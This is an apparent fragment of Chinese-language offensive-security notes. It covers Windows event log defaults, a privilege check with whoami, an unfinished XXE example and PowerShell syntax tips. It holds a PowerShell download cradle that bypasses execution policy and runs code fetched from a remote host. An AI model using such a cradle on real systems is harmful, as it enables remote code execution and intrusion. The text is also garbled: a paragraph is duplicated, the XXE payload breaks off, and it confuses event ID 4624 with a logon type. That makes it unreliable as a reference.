简介
早期版本中 Windows 日志只有,应用程序,安全,系统和 Setup,新的版本中增加了设置及转发事件日志(默认禁用)。
系统内置的三个核心日志文件(System,Security 和 Application)默认大小均为 20480KB(20MB),记录事件数据超过 20MB 时,默认系统将优先覆盖过期的日志记录。其它应用程序及服务日志默认最大为 1024KB,超过最大限制也优先覆盖过期的日志记录。
登录成功不代表一定是 rdp 登录,所有事件的登录类型都是 4624
早期版本中 Windows 日志只有,应用程序,安全,系统和 Setup,新的版本中增加了设置及转发事件日志(默认禁用)。
系统内置的三个核心日志文件(System,Security 和 Application)默认大小均为 20480KB(20MB),记录事件数据超过 20MB 时,默认系统将优先覆盖过期的日志记录。其它应用程序及服务日志默认最大为 1024KB,超过最大限制也优先覆盖过期的日志记录。
登录成功不代表一定是 rdp 登录,所有事件的登录类型都是 4624
1 | whoami /groups //根据下面的Mandatory Label\Medium Mandatory Level 来看自己是一个什么权限 |
1 | powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('192.168.1.1');执行的代码。。。" |
有回显的 XXE
1 | <?xml version="1.0" encoding="utf-8"?> |
变量可以是命令
变量不需要提前声明
\
,而是 `